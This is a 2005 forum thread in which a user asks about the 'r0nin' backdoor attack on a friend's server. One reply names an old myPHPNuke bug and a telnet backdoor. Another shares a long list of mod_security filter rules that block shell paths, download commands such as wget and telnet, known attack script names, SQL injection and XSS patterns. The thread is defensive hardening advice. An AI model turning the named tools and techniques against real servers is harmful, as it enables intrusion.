Forums: R0nin? - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

R0nin?

#1 User is offline   saetji 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 212
  • Joined: 22-October 03

Posted 26 October 2005 - 02:38 PM

I'm not really a nix person myself (yet) but a friend's server seems to be attacked by the r0nin exploit and I can only seem to find references to the exploit and not any details...

Could someone be kind enough to explain what the r0nin exploit is, what it attacks, and how to prevent it (links will be fine)

Thanks
0

#2 User is offline   current 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 31
  • Joined: 11-October 05

Posted 26 October 2005 - 03:45 PM

Hi,

the r0nin exploit obviously is a packet which uses an really old bug in myPHPNuke to put a backdoor on the system and run it afterwards. This backdoor is named Psychophobia and provides a telnet server.

This seems to be a very old or not very well known package, google didnt give much.

You should advise your friend to immidiatly get the newest version of myPHPNuke.



Here the security advice: hxxp://secunia.com/advisories/9721/


Greetz,

current
0

#3 User is offline   fynflood 

  • Private
  • Icon
  • Group: Members
  • Posts: 1
  • Joined: 25-October 05

Posted 27 October 2005 - 06:21 AM

r0nin is a backdoor, which listens on port 1666 by default. You will mostly only see precompiled instances of this... I have yet to come across the source for this specific Psychophobia.

There are many ways it can find it's way on your server, and not just "an really old bug in myPHPNuke ", in fact, any php app that has vuls can land it. The newest release of phpBB2 (2.0.17) has exploits out also.

I find mod_security does a very good job of keeping this, and other url based exploits at bay... Here are the rules I use:


SecFilter /bin/sh
SecFilter /bin/bash
SecFilter /bin/tcsh
SecFilter /bin/csh

SecFilter /var/spool
SecFilter /dev/shm
SecFilter /var/tmp
SecFilter /bin/ps
SecFilter /usr/local/flash

SecFilter udp.pl
SecFilter r0nin
SecFilter pbsync
SecFilter bindz
SecFilter inetd
SecFilter psybnc
SecFilter PhiLaR.pl
SecFilter php-shell.php
SecFilter phpshell.php
SecFilter dc.pl
SecFilter elflbl
SecFilter zregbot
SecFilter irclordz
SecFilter dalnet

#Detect attempts to execute binaries residing in /bin
SecFilterSelective ARGS "/bin/"
SecFilterSelective ARGS "/usr/bin/"

## PHPBB Vulnerability
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
SecFilter "admin_styles.php\?" chain
SecFilter "\$_GET"

# WEB-PHP Mail Exploit
SecFilterSelective THE_REQUEST "data/album\.php" deny,log
SecFilter "b77ybvFuiTAy" deny,log

# CPANEL Guestbook
#SecFilter "admin\.php\?action.*uid=1([^0-9]|$)"

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
#SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilterSelective THE_REQUEST "/usr/bin/gcc"

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
#SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget"
SecFilterSelective THE_REQUEST "lynx"
SecFilterSelective THE_REQUEST "scp"
SecFilterSelective THE_REQUEST "cvs"
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet"
SecFilterSelective THE_REQUEST "echo"
SecFilterSelective THE_REQUEST "links -dump"
SecFilterSelective THE_REQUEST "links -dump-charset"
SecFilterSelective THE_REQUEST "links -dump-width"
SecFilterSelective THE_REQUEST "links http://"
SecFilterSelective THE_REQUEST "links ftp://"
SecFilterSelective THE_REQUEST "links -source"
SecFilterSelective THE_REQUEST "mkdir"
SecFilterSelective THE_REQUEST "cd /tmp"
SecFilterSelective THE_REQUEST "cd /var/tmp"
SecFilterSelective THE_REQUEST "cd /var/netenberg"
SecFilterSelective THE_REQUEST "uname -a"
SecFilterSelective THE_REQUEST "\.htgroup"
SecFilterSelective THE_REQUEST "\.htaccess"

# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"

# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"

# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."

# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"

# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"

# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"

# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"

# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"

# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass

# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"

# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"

# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"

# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"

# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting